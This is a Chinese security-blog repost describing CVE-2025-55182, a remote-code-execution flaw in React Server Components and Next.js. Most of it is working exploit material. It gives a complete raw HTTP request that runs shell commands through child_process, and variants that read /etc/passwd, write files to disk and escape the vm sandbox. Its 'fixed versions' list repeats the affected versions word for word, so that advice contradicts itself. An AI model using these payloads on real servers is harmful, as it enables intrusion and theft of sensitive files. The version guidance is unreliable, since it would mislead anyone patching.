文章总结: CVE-2025-55182是React服务器组件的原型链漏洞,影响react-server-dom-webpack、react-server-dom-turbopack和Next.js特定版本。攻击者可通过构造恶意请求执行任意代码、读取敏感文件或执行shell命令。文章提供了复现环境和多种攻击变种,包括执行命令、文件读写和沙盒逃逸。建议用户尽快更新到修复版本以避免潜在风险。
综合评分: 85
文章分类: 漏洞分析,WEB安全,渗透测试
CVE-2025-55182 – React 服务器组件原型链漏洞
原创
tuyi and wenject
湘岚实验室
2025年12月4日 11:38
湖南
受影响版本
react-server-dom-webpack >= 19.2.0
react-server-dom-turbopack:>= 19.2.0
Next.js:15.0.5+
复现环境
复现环境
好靶场:好靶场平台-安全靶场-网络安全靶场
本地复现
https://github.com/ejpir/CVE-2025-55182-poc
原始数据包
POST /formaction HTTP/1.1Host:User-Agent: curl/8.5.0Accept: /Content-Length: 389Content-Type: multipart/form-data; boundary=------------------------G232yRVmFxDsgFPQ3weD6M--------------------------G232yRVmFxDsgFPQ3weD6MContent-Disposition: form-data; name="$ACTION_REF_0"--------------------------G232yRVmFxDsgFPQ3weD6MContent-Disposition: form-data; name="$ACTION_0:0"Content-Type: application/json{"id": "vm#runInThisContext","bound": ["global.process.mainModule.require("child_process").execSync("id").toString()"]}--------------------------G232yRVmFxDsgFPQ3weD6M--
其他变种
执行 shell 命令(whoami):{ id: 'child_process#execSync', bound: ['whoami'] }读取敏感文件:{ id: 'fs#readFileSync', bound: ['/etc/passwd'] }将文件写入磁盘:{ id: 'fs#writeFileSync', bound: ['/tmp/pwned.txt', 'CVE-2025-55182'] }执行任意 JavaScript 代码:{id: 'vm#runInThisContext',bound: ['process.mainModule.require("child_process").execSync("id").toString()']}沙盒逃生(vm.runInNewContext):{id: 'vm#runInNewContext',bound: ['this.constructor.constructor("return process")().mainModule.require("child_process").execSync("whoami").toString()']}
修复版本
react-server-dom-webpack:>= 19.2.0
react-server-dom-turbopack:>= 19.2.0
Next.js:15.0.5+
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:湘岚实验室 tuyi and wenject《CVE-2025-55182 – React 服务器组件原型链漏洞》